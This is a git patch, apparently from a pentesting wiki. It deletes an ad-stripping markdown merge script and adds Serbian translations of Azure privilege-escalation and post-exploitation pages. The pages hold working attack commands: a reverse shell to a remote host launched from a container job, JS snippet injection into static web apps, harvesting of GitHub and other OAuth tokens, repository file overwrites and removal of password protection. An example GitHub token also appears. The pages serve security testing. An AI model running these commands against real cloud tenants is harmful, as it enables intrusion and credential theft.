From e2a3c7844ba5fbdcac7d4084b9f327acdf7002be Mon Sep 17 00:00:00 2001
From: Translator
Date: Wed, 2 Apr 2025 15:53:28 +0000
Subject: [PATCH] Translated ['src/pentesting-cloud/azure-security/az-post-exploitation/az
---
 scripts/clean_for_ai.py | 145 --------
 .../az-key-vault-post-exploitation.md | 6 +
 ...z-container-instances-apps-jobs-privesc.md | 29 +-
 .../az-static-web-apps-privesc.md | 333 +++++++++---------
 ...az-virtual-machines-and-network-privesc.md | 36 +-
 5 files changed, 206 insertions(+), 343 deletions(-)
 delete mode 100644 scripts/clean_for_ai.py
diff --git a/scripts/clean_for_ai.py b/scripts/clean_for_ai.py
deleted file mode 100644
index dd8035ed0..000000000
--- a/scripts/clean_for_ai.py
+++ /dev/null
@@ -1,145 +0,0 @@
-import os
-import re
-import tempfile
-
-def clean_and_merge_md_files(start_folder, exclude_keywords, output_file):
- def clean_file_content(file_path):
- """Clean the content of a single file and return the cleaned lines."""
- with open(file_path, "r", encoding="utf-8") as f:
- content = f.readlines()
-
- cleaned_lines = []
- inside_hint = False
- for i,line in enumerate(content):
- # Skip lines containing excluded keywords
- if any(keyword in line for keyword in exclude_keywords):
- continue
-
- # Detect and skip {% hint %} ... {% endhint %} blocks
- if "{% hint style=\"success\" %}" in line and "Learn & practice" in content[i+1]:
- inside_hint = True
- if "{% endhint %}" in line:
- inside_hint = False
- continue
- if inside_hint:
- continue
-
- # Skip lines with
...
- if re.match(r"
.*?
", line):
- continue
-
- # Add the line if it passed all checks
- cleaned_lines.append(line.rstrip())
-
- # Remove excess consecutive empty lines
- cleaned_lines = remove_consecutive_empty_lines(cleaned_lines)
- return cleaned_lines
-
- def remove_consecutive_empty_lines(lines):
- """Allow no more than one consecutive empty line."""
- cleaned_lines = []
- previous_line_empty = False
- for line in lines:
- if line.strip() == "":
- if not previous_line_empty:
- cleaned_lines.append("")
- previous_line_empty = True
- else:
- cleaned_lines.append(line)
- previous_line_empty = False
- return cleaned_lines
-
- def gather_files_in_order(start_folder):
- """Gather all .md files in a depth-first order."""
- files = []
- for root, _, filenames in os.walk(start_folder):
- md_files = sorted([os.path.join(root, f) for f in filenames if f.endswith(".md")])
- files.extend(md_files)
- return files
-
- # Gather files in depth-first order
- all_files = gather_files_in_order(start_folder)
-
- # Process files and merge into a single output
- with open(output_file, "w", encoding="utf-8") as output:
- for file_path in all_files:
- # Clean the content of the file
- cleaned_content = clean_file_content(file_path)
-
- # Skip saving if the cleaned file has fewer than 10 non-empty lines
- if len([line for line in cleaned_content if line.strip()]) < 10:
- continue
-
- # Get the name of the file for the header
- file_name = os.path.basename(file_path)
-
- # Write header, cleaned content, and 2 extra new lines
- output.write(f"# {file_name}\n\n")
- output.write("\n".join(cleaned_content))
- output.write("\n\n")
-
-def main():
- # Specify the starting folder and output file
- start_folder = os.getcwd()
- output_file = os.path.join(tempfile.gettempdir(), "merged_output.md")
-
- # Keywords to exclude from lines
- exclude_keywords = [
- "STM Cyber", # STM Cyber ads
- "offer several valuable cybersecurity services", # STM Cyber ads
- "and hack the unhackable", # STM Cyber ads
- "blog.stmcyber.com",
# STM Cyber ads
-
- "RootedCON", # RootedCON ads
- "rootedcon.com", # RootedCON ads
- "the mission of promoting technical knowledge", # RootedCON ads
-
- "Intigriti", # Intigriti ads
- "intigriti.com", # Intigriti ads
-
- "Trickest", # Trickest ads
- "trickest.com", # Trickest ads,
- "Get Access Today:",
-
- "HACKENPROOF", # Hackenproof ads
- "hackenproof.com", # Hackenproof ads
- "HackenProof", # Hackenproof ads
- "discord.com/invite/N3FrSbmwdy", # Hackenproof ads
- "Hacking Insights:", # Hackenproof ads
- "Engage with content that delves", # Hackenproof ads
- "Real-Time Hack News:", # Hackenproof ads
- "Keep up-to-date with fast-paced", # Hackenproof ads
- "Latest Announcements:", # Hackenproof ads
- "Stay informed with the newest bug", # Hackenproof ads
- "start collaborating with top hackers today!", # Hackenproof ads
- "discord.com/invite/N3FrSbmwdy", # Hackenproof ads
-
- "Pentest-Tools", # Pentest-Tools.com ads
- "pentest-tools.com", # Pentest-Tools.com ads
- "perspective on your web apps, network, and", # Pentest-Tools.com ads
- "report critical, exploitable vulnerabilities with real business impact", # Pentest-Tools.com ads
-
- "SerpApi", # SerpApi ads
- "serpapi.com", # SerpApi ads
- "offers fast and easy real-time", # SerpApi ads
- "plans includes access to over 50 different APIs for scraping", # SerpApi ads
-
- "8kSec", # 8kSec ads
- "academy.8ksec.io", # 8kSec ads
- "Learn the technologies and skills required", # 8kSec ads
-
- "WebSec", # WebSec ads
- "websec.nl", # WebSec ads
- "which means they do it all; Pentesting", # WebSec ads
- ]
-
- # Clean and merge .md files
- clean_and_merge_md_files(start_folder, exclude_keywords, output_file)
-
- # Print the path to the output file
- print(f"Merged content has been saved to: {output_file}")
-
-if __name__ == "__main__":
- # Execute this from the hacktricks folder to clean
- # It will clean all the .md files and compile them into 1 in a proper order
- main()
diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
index b47d7f123..4387301fb 100644
--- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
+++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
@@ -85,5 +85,11 @@ az keyvault secret delete --vault-name --name
 Ova dozvola omogućava principalu da vrati tajnu iz rezervne kopije.
 ```bash
 az keyvault secret restore --vault-name --file
+```
+### Microsoft.KeyVault/vaults/keys/recover/action
+Omogućava oporavak prethodno obrisanog ključa iz Azure Key Vault-a
+```bash
+az keyvault secret recover --vault-name --name
+
 ```
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md
index 9a3276c52..a37f3ea49 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md
@@ -14,7 +14,7 @@ Za više informacija pogledajte: ### `Microsoft.ContainerInstance/containerGroups/read`, `Microsoft.ContainerInstance/containerGroups/containers/exec/action` -Ove dozvole omogućavaju korisniku da **izvrši komandu** u pokrenutom kontejneru. Ovo se može koristiti za **povećanje privilegija** u kontejneru ako ima neku upravljanu identitet. Naravno, takođe je moguće pristupiti izvoru koda i bilo kojim drugim osetljivim informacijama pohranjenim unutar kontejnera. +Ove dozvole omogućavaju korisniku da **izvrši komandu** u pokrenutom kontejneru. Ovo se može koristiti za **eskalaciju privilegija** u kontejneru ako ima neku upravljanu identitet. Naravno, takođe je moguće pristupiti izvoru koda i bilo kojim drugim osetljivim informacijama pohranjenim unutar kontejnera. Da biste dobili shell, dovoljno je: ```bash @@ -30,9 +30,9 @@ az container logs --name --resource-group ``` ### `Microsoft.ContainerInstance/containerGroups/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` -Ove dozvole omogućavaju **priključivanje korisnički upravljane identitete** grupi kontejnera. Ovo je veoma korisno za eskalaciju privilegija u kontejneru. +Ove dozvole omogućavaju **priključivanje korisnički upravljane identitete** na grupu kontejnera. Ovo je veoma korisno za eskalaciju privilegija u kontejneru. -Da biste priključili korisnički upravljanu identitetu grupi kontejnera: +Da biste priključili korisnički upravljanu identitetu na grupu kontejnera: ```bash az rest \ --method PATCH \ 
@@ -67,7 +67,7 @@ Moreover, it's also possible to update an existing container group adding for ex ### `Microsoft.App/containerApps/read`, `Microsoft.App/managedEnvironments/read`, `microsoft.app/containerapps/revisions/replicas`, `Microsoft.App/containerApps/revisions/read`, `Microsoft.App/containerApps/getAuthToken/action` -Ove dozvole omogućavaju korisniku da **dobije shell** u pokrenutom aplikacionom kontejneru. Ovo se može koristiti za **eskalaciju privilegija** u kontejneru ako ima neku upravljanu identitetu prikačenu. Ofc, takođe je moguće pristupiti izvoru koda i bilo kojim drugim osetljivim informacijama smeštenim unutar kontejnera. +Ove dozvole omogućavaju korisniku da **dobije shell** u pokrenutom aplikacionom kontejneru. Ovo se može koristiti za **escalaciju privilegija** u kontejneru ako ima neku upravljanu identitet prikačenu. Ofc, takođe je moguće pristupiti izvoru koda i bilo kojim drugim osetljivim informacijama pohranjenim unutar kontejnera. ```bash az containerapp exec --name --resource-group --command "sh" az containerapp debug --name --resource-group 
@@ -75,22 +75,22 @@ az containerapp debug --name --resource-group ``` ### `Microsoft.App/containerApps/listSecrets/action` -Ova dozvola omogućava dobijanje **čistog teksta tajni** konfiguranih unutar aplikacije kontejnera. Imajte na umu da se tajne mogu konfigurisati sa čistim tekstom ili sa linkom na ključnu riznicu (u tom slučaju će aplikaciji biti dodeljen upravljani identitet sa pristupom tajnama). +Ova dozvola omogućava dobijanje **čistog teksta tajni** konfiguranih unutar aplikacije kontejnera. Imajte na umu da se tajne mogu konfigurisati sa čistim tekstom ili sa linkom ka ključnom trezoru (u tom slučaju, aplikaciji će biti dodeljen upravljani identitet sa pristupom nad tajnama). ```bash az containerapp secret list --name --resource-group az containerapp secret show --name --resource-group --secret-name ``` ### `Microsoft.App/containerApps/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` -Ove dozvole omogućavaju **priključivanje korisnički upravljane identitete** na aplikaciju kontejnera. Ovo je veoma korisno za eskalaciju privilegija u kontejneru. Izvršavanje ove akcije iz az cli takođe zahteva dozvolu `Microsoft.App/containerApps/listSecrets/action`. +Ove dozvole omogućavaju **priključivanje identiteta koji upravlja korisnik** na aplikaciju kontejnera. Ovo je veoma korisno za eskalaciju privilegija u kontejneru. Izvršavanje ove akcije iz az cli takođe zahteva dozvolu `Microsoft.App/containerApps/listSecrets/action`. 
-Da biste priključili korisnički upravljanu identitetu grupi kontejnera: +Da biste priključili identitet koji upravlja korisnik na grupu kontejnera: ```bash az containerapp identity assign -n -g --user-assigned myUserIdentityName ``` ### `Microsoft.App/containerApps/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.App/managedEnvironments/join/action` -Ove dozvole omogućavaju **kreiranje ili ažuriranje aplikacionog kontejnera** sa **korisnički upravljanom identitetom** prikačenim na njega. Ovo je veoma korisno za eskalaciju privilegija u kontejneru. +Ove dozvole omogućavaju **kreiranje ili ažuriranje aplikacionog kontejnera** sa **korisnički upravljanom identitetom** prikačenom na njega. Ovo je veoma korisno za eskalaciju privilegija u kontejneru. ```bash # Get environments az containerapp env list --resource-group Resource_Group_1 @@ -106,7 +106,7 @@ az containerapp create \ --command "" ``` > [!TIP] -> Imajte na umu da se sa ovim dozvolama **mogu modifikovati druge konfiguracije aplikacije** što može omogućiti izvođenje drugih privesc i post eksploitacionih napada u zavisnosti od konfiguracije postojećih aplikacija. +> Imajte na umu da se sa ovim dozvolama **mogu modifikovati druge konfiguracije aplikacije** što može omogućiti izvođenje drugih privesc i post-exploitation napada u zavisnosti od konfiguracije postojećih aplikacija. ## Jobs 
@@ -150,7 +150,7 @@ az containerapp job update \ ``` ### `Microsoft.App/managedEnvironments/read`, `Microsoft.App/jobs/write`, `Microsoft.App/managedEnvironments/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` -Ako možete da kreirate novi Container Apps Job (ili ažurirate postojeći) i povežete upravljenu identitet, možete dizajnirati posao da izvrši payload koji eskalira privilegije. Na primer, mogli biste da kreirate novi posao koji ne samo da pokreće reverznu ljusku, već takođe koristi kredencijale upravljene identiteta da zatraži tokene ili pristup drugim resursima. +Ako možete da kreirate novi Container Apps Job (ili ažurirate postojeći) i povežete upravljeni identitet, možete dizajnirati posao da izvrši payload koji eskalira privilegije. Na primer, mogli biste da kreirate novi posao koji ne samo da pokreće reverznu ljusku, već takođe koristi kredencijale upravljanog identiteta da zatraži tokene ili pristup drugim resursima. ```bash az containerapp job create \ --name \ 
@@ -165,13 +165,18 @@ az containerapp job create \ --command "bash -c 'bash -i >& /dev/tcp// 0>&1'" ``` > [!TIP] -> Ova komanda će izazvati grešku ako nemate `Microsoft.App/jobs/read` dozvolu, iako će posao biti kreiran. +> Ova komanda će izazvati grešku ako nemate dozvolu `Microsoft.App/jobs/read`, iako će posao biti kreiran. ### `microsoft.app/jobs/start/action`, `microsoft.app/jobs/read` -Izgleda da bi sa ovim dozvolama trebalo biti moguće pokrenuti posao. Ovo bi moglo biti korišćeno za pokretanje posla sa reverznim shell-om ili bilo kojom drugom zlonamernom komandom bez potrebe za modifikovanjem konfiguracije posla. +Izgleda da bi sa ovim dozvolama trebalo biti moguće pokrenuti posao. Ovo se može koristiti za pokretanje posla sa reverznim shell-om ili bilo kojom drugom zlonamernom komandom bez potrebe za modifikovanjem konfiguracije posla. Nisam uspeo da to funkcioniše, ali prema dozvoljenim parametrima, to bi trebalo biti moguće. +### Microsoft.ContainerInstance/containerGroups/restart/action +Omogućava ponovno pokretanje specifične grupe kontejnera unutar Azure Container Instances. +```bash +az container restart --resource-group --name +``` {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md index 799219ed9..ec0620df4 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md @@ -4,7 +4,7 @@ ## Azure Static Web Apps -For more information about this service check: +Za više informacija o ovoj usluzi proverite: {{#ref}} ../az-services/az-static-web-apps.md 
@@ -12,164 +12,153 @@ For more information about this service check: ### Microsoft.Web/staticSites/snippets/write -It's possible to make a static web page load arbitary HTML code by creating a snippet. This could allow an attacker to inject JS code inside the web app and steal sensitive information such as credentials or mnemonic keys (in web3 wallets). - -The fllowing command create an snippet that will always be loaded by the web app:: +Moguće je napraviti statičku web stranicu koja učitava proizvoljni HTML kod kreiranjem snippeta. Ovo bi moglo omogućiti napadaču da ubrizga JS kod unutar web aplikacije i ukrade osetljive informacije kao što su akreditivi ili mnemoničke ključeve (u web3 novčanicima). +Sledeća komanda kreira snippet koji će uvek biti učitan od strane web aplikacije:: ```bash az rest \ - --method PUT \ - --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//snippets/?api-version=2022-03-01" \ - --headers "Content-Type=application/json" \ - --body '{ - "properties": { - "name": "supersnippet", - "location": "Body", - "applicableEnvironmentsMode": "AllEnvironments", - "content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K", - "environments": [], - "insertBottom": false - } - }' +--method PUT \ +--uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//snippets/?api-version=2022-03-01" \ +--headers "Content-Type=application/json" \ +--body '{ +"properties": { +"name": "supersnippet", +"location": "Body", +"applicableEnvironmentsMode": "AllEnvironments", +"content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K", +"environments": [], +"insertBottom": false +} +}' ``` +### Pročitajte Konfigurisane Treće Strane Akreditive -### Read Configured Third Party Credentials - -As explained in the App Service section: +Kao što je objašnjeno u sekciji App Service: {{#ref}} ../az-privilege-escalation/az-app-services-privesc.md {{#endref}} 
-Running the following command it's possible to **read the third party credentials** configured in the current account. Note that if for example some Github credentials are configured in a different user, you won't be able to access the token from a different one. - +Pokretanjem sledeće komande moguće je **pročitati akreditive treće strane** konfigurisane u trenutnom nalogu. Imajte na umu da, na primer, ako su neki Github akreditive konfigurisani za drugog korisnika, nećete moći da pristupite tokenu iz drugog. ```bash az rest --method GET \ - --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01" +--url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01" ``` +Ova komanda vraća tokene za Github, Bitbucket, Dropbox i OneDrive. -This command returns tokens for Github, Bitbucket, Dropbox and OneDrive. - -Here you have some command examples to check the tokens: - +Evo nekoliko primera komandi za proveru tokena: ```bash # GitHub – List Repositories curl -H "Authorization: token " \ - -H "Accept: application/vnd.github.v3+json" \ - https://api.github.com/user/repos +-H "Accept: application/vnd.github.v3+json" \ +https://api.github.com/user/repos # Bitbucket – List Repositories curl -H "Authorization: Bearer " \ - -H "Accept: application/json" \ - https://api.bitbucket.org/2.0/repositories +-H "Accept: application/json" \ +https://api.bitbucket.org/2.0/repositories # Dropbox – List Files in Root Folder curl -X POST https://api.dropboxapi.com/2/files/list_folder \ - -H "Authorization: Bearer " \ - -H "Content-Type: application/json" \ - --data '{"path": ""}' +-H "Authorization: Bearer " \ +-H "Content-Type: application/json" \ +--data '{"path": ""}' # OneDrive – List Files in Root Folder curl -H "Authorization: Bearer " \ - -H "Accept: application/json" \ - https://graph.microsoft.com/v1.0/me/drive/root/children +-H "Accept: application/json" \ 
+https://graph.microsoft.com/v1.0/me/drive/root/children ``` +### Prepisivanje fajla - Prepisivanje ruta, HTML, JS... -### Overwrite file - Overwrite routes, HTML, JS... +Moguće je **prepisati fajl unutar Github repozitorijuma** koji sadrži aplikaciju putem Azure-a, šaljući zahtev sa **Github tokenom** kao što je sledeći, koji će označiti putanju fajla koji treba prepisati, sadržaj fajla i poruku o komitu. -It's possible to **overwrite a file inside the Github repo** containing the app through Azure having the **Github token** sending a request such as the following which will indicate the path of the file to overwrite, the content of the file and the commit message. - -This can be abused by attackers to basically **change the content of the web app** to serve malicious content (steal credentials, mnemonic keys...) or just to **re-route certain paths** to their own servers by overwriting the `staticwebapp.config.json` file. +Ovo mogu zloupotrebiti napadači da suštinski **promene sadržaj web aplikacije** kako bi servirali maliciozan sadržaj (ukrali akreditive, mnemoničke ključeve...) ili samo da **preusmere određene putanje** na svoje servere prepisivanjem `staticwebapp.config.json` fajla. > [!WARNING] -> Note that if an attacker manages to compromise the Github repo in any way, they can also overwrite the file directly from Github. - +> Imajte na umu da ako napadač uspe da kompromituje Github repozitorijum na bilo koji način, takođe može direktno prepisati fajl sa Github-a. 
```bash curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \ -H "Content-Type: application/json" \ -d '{ - "commit": { - "message": "Update static web app route configuration", - "branchName": "main", - "committer": { - "name": "Azure App Service", - "email": "donotreply@microsoft.com" - }, - "contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==", - "filePath": "staticwebapp.config.json", - "message": "Update static web app route configuration", - "repoName": "carlospolop/my-first-static-web-app", - "sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4" - }, - "gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL" +"commit": { +"message": "Update static web app route configuration", +"branchName": "main", +"committer": { +"name": "Azure App Service", +"email": "donotreply@microsoft.com" +}, +"contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==", +"filePath": "staticwebapp.config.json", +"message": "Update static web app route configuration", +"repoName": "carlospolop/my-first-static-web-app", +"sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4" +}, +"gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL" }' ``` +### 
Microsoft.Web/staticSites/config/write - -### Microsoft.Web/staticSites/config/write - -With this permission, it's possible to **modify the password** protecting a static web app or even unprotect every environment by sending a request such as the following: - +Sa ovom dozvolom, moguće je **izmeniti lozinku** koja štiti statičku web aplikaciju ili čak ukloniti zaštitu sa svake okoline slanjem zahteva kao što je sledeći: ```bash # Change password az rest --method put \ --url "/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//config/basicAuth?api-version=2021-03-01" \ --headers 'Content-Type=application/json' \ --body '{ - "name": "basicAuth", - "type": "Microsoft.Web/staticSites/basicAuth", - "properties": { - "password": "SuperPassword123.", - "secretUrl": "", - "applicableEnvironmentsMode": "AllEnvironments" - } +"name": "basicAuth", +"type": "Microsoft.Web/staticSites/basicAuth", +"properties": { +"password": "SuperPassword123.", +"secretUrl": "", +"applicableEnvironmentsMode": "AllEnvironments" +} }' + + # Remove the need of a password az rest --method put \ --url "/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//config/basicAuth?api-version=2021-03-01" \ --headers 'Content-Type=application/json' \ --body '{ - "name": "basicAuth", - "type": "Microsoft.Web/staticSites/basicAuth", - "properties": { - "secretUrl": "", - "applicableEnvironmentsMode": "SpecifiedEnvironments", - "secretState": "None" - } +"name": "basicAuth", +"type": "Microsoft.Web/staticSites/basicAuth", +"properties": { +"secretUrl": "", +"applicableEnvironmentsMode": "SpecifiedEnvironments", +"secretState": "None" +} }' ``` - ### Microsoft.Web/staticSites/listSecrets/action -This permission allows to get the **API key deployment token** for the static app: - +Ova dozvola omogućava dobijanje **API ključa za token za implementaciju** za statičku aplikaciju: ```bash az rest --method POST \ --url 
"https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/staticSites//listSecrets?api-version=2023-01-01" ``` +Zatim, da biste **ažurirali aplikaciju koristeći token**, možete pokrenuti sledeću komandu. Imajte na umu da je ova komanda izvučena proverom **kako Github Action [https://github.com/Azure/static-web-apps-deploy](https://github.com/Azure/static-web-apps-deploy) funkcioniše**, jer je to ono što je Azure postavio kao podrazumevano za korišćenje. Tako da se slika i parametri mogu promeniti u budućnosti. -Then, in order to **update an app using the token** you could run the following command. Note that this command was extracted checking **how to Github Action [https://github.com/Azure/static-web-apps-deploy](https://github.com/Azure/static-web-apps-deploy) works**, as it's the one Azure set by default ot use. So the image and paarements could change in the future. - -1. Download the repo [https://github.com/staticwebdev/react-basic](https://github.com/staticwebdev/react-basic) (or any other repo you want to deploy) and run `cd react-basic`. -2. Change the code you want to deploy -3. Deploy it running (Remember to change the ``): +> [!TIP] +> Da biste implementirali aplikaciju, možete koristiti **`swa`** alat iz [https://azure.github.io/static-web-apps-cli/docs/cli/swa-deploy#deployment-token](https://azure.github.io/static-web-apps-cli/docs/cli/swa-deploy#deployment-token) ili pratiti sledeće sirove korake: +1. Preuzmite repo [https://github.com/staticwebdev/react-basic](https://github.com/staticwebdev/react-basic) (ili bilo koji drugi repo koji želite da implementirate) i pokrenite `cd react-basic`. +2. Promenite kod koji želite da implementirate +3. 
Implementirajte ga pokretanjem (Zapamtite da promenite ``): ```bash docker run --rm -v $(pwd):/mnt mcr.microsoft.com/appsvc/staticappsclient:stable INPUT_AZURE_STATIC_WEB_APPS_API_TOKEN= INPUT_APP_LOCATION="/mnt" INPUT_API_LOCATION="" INPUT_OUTPUT_LOCATION="build" /bin/staticsites/StaticSitesClient upload --verbose ``` - ->[!WARNING] -> Even if you have the token you won't be able to deploy the app if the **Deployment Authorization Policy** is set to **Github**. For using the token you will need the permission `Microsoft.Web/staticSites/write` to change the deployment method to use th APi token. +> [!WARNING] +> Čak i ako imate token, nećete moći da implementirate aplikaciju ako je **Politika autorizacije implementacije** postavljena na **Github**. Za korišćenje tokena biće vam potrebna dozvola `Microsoft.Web/staticSites/write` da promenite metodu implementacije da koristi APi token. ### Microsoft.Web/staticSites/write -With this permission it's possible to **change the source of the static web app to a different Github repository**, however, it won't be automatically provisioned as this must be done from a Github Action. +Sa ovom dozvolom je moguće **promeniti izvor statičke web aplikacije na drugi Github repozitorijum**, međutim, neće biti automatski obezbeđen jer to mora biti urađeno iz Github akcije. -However, if the **Deployment Authotization Policy** is set to **Github**, it's possible to **update the app from the new source repository!**. - -In case the **Deployment Authorization Policy** is not set to Github, you can change it with the same permission `Microsoft.Web/staticSites/write`. +Međutim, ako je **Politika autorizacije implementacije** postavljena na **Github**, moguće je **ažurirati aplikaciju iz novog izvora repozitorijuma!**. +U slučaju da **Politika autorizacije implementacije** nije postavljena na Github, možete je promeniti sa istom dozvolom `Microsoft.Web/staticSites/write`. 
```bash # Change the source to a different Github repository az staticwebapp update --name my-first-static-web-app --resource-group Resource_Group_1 --source https://github.com/carlospolop/my-first-static-web-app -b main 
@@ -179,117 +168,109 @@ az rest --method PATCH \ --url "https://management.azure.com/subscriptions/>/resourceGroups//providers/Microsoft.Web/staticSites/?api-version=2022-09-01" \ --headers 'Content-Type=application/json' \ --body '{ - "properties": { - "allowConfigFileUpdates": true, - "stagingEnvironmentPolicy": "Enabled", - "buildProperties": { - "appLocation": "/", - "apiLocation": "", - "appArtifactLocation": "build" - }, - "deploymentAuthPolicy": "GitHub", - "repositoryToken": "" # az rest --method GET --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01" - } +"properties": { +"allowConfigFileUpdates": true, +"stagingEnvironmentPolicy": "Enabled", +"buildProperties": { +"appLocation": "/", +"apiLocation": "", +"appArtifactLocation": "build" +}, +"deploymentAuthPolicy": "GitHub", +"repositoryToken": "" # az rest --method GET --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01" +} }' ``` - -Example Github Action to deploy the app: - +Primer Github akcije za implementaciju aplikacije: ```yaml name: Azure Static Web Apps CI/CD on: - push: - branches: - - main - pull_request: - types: [opened, synchronize, reopened, closed] - branches: - - main +push: +branches: +- main +pull_request: +types: [opened, synchronize, reopened, closed] +branches: +- main jobs: - build_and_deploy_job: - if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') - runs-on: ubuntu-latest - name: Build and Deploy Job - permissions: - id-token: write - contents: read - steps: - - uses: actions/checkout@v3 - with: - submodules: true - lfs: false - - name: Install OIDC Client from Core Package - run: npm install @actions/core@1.6.0 @actions/http-client - - name: Get Id Token - uses: actions/github-script@v6 - id: idtoken - with: - script: | - const coredemo = require('@actions/core') - return await coredemo.getIDToken() - result-encoding: string - - 
name: Build And Deploy - id: builddeploy - uses: Azure/static-web-apps-deploy@v1 - with: - azure_static_web_apps_api_token: "12345cbb198a77a092ff885782a62a15d5aef5e3654cac1234509ab54547270704-4140ccee-e04f-424f-b4ca-3d4dd123459c00f0702071d12345" # A valid formatted token is needed although it won't be used for authentication - action: "upload" - ###### Repository/Build Configurations - These values can be configured to match your app requirements. ###### - # For more information regarding Static Web App workflow configurations, please visit: https://aka.ms/swaworkflowconfig - app_location: "/" # App source code path - api_location: "" # Api source code path - optional - output_location: "build" # Built app content directory - optional - github_id_token: ${{ steps.idtoken.outputs.result }} - ###### End of Repository/Build Configurations ###### +build_and_deploy_job: +if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') +runs-on: ubuntu-latest +name: Build and Deploy Job +permissions: +id-token: write +contents: read +steps: +- uses: actions/checkout@v3 +with: +submodules: true +lfs: false +- name: Install OIDC Client from Core Package +run: npm install @actions/core@1.6.0 @actions/http-client +- name: Get Id Token +uses: actions/github-script@v6 +id: idtoken +with: +script: | +const coredemo = require('@actions/core') +return await coredemo.getIDToken() +result-encoding: string +- name: Build And Deploy +id: builddeploy +uses: Azure/static-web-apps-deploy@v1 +with: +azure_static_web_apps_api_token: "12345cbb198a77a092ff885782a62a15d5aef5e3654cac1234509ab54547270704-4140ccee-e04f-424f-b4ca-3d4dd123459c00f0702071d12345" # A valid formatted token is needed although it won't be used for authentication +action: "upload" +###### Repository/Build Configurations - These values can be configured to match your app requirements. 
###### +# For more information regarding Static Web App workflow configurations, please visit: https://aka.ms/swaworkflowconfig +app_location: "/" # App source code path +api_location: "" # Api source code path - optional +output_location: "build" # Built app content directory - optional +github_id_token: ${{ steps.idtoken.outputs.result }} +###### End of Repository/Build Configurations ###### - close_pull_request_job: - if: github.event_name == 'pull_request' && github.event.action == 'closed' - runs-on: ubuntu-latest - name: Close Pull Request Job - steps: - - name: Close Pull Request - id: closepullrequest - uses: Azure/static-web-apps-deploy@v1 - with: - action: "close" +close_pull_request_job: +if: github.event_name == 'pull_request' && github.event.action == 'closed' +runs-on: ubuntu-latest +name: Close Pull Request Job +steps: +- name: Close Pull Request +id: closepullrequest +uses: Azure/static-web-apps-deploy@v1 +with: +action: "close" ``` - ### Microsoft.Web/staticSites/resetapikey/action -With this permision it's possible to **reset the API key of the static web app** potentially DoSing the workflows that automatically deploy the app. - +Sa ovom dozvolom je moguće **resetovati API ključ statičke web aplikacije** potencijalno DoSing radne tokove koji automatski implementiraju aplikaciju. ```bash az rest --method POST \ - --url 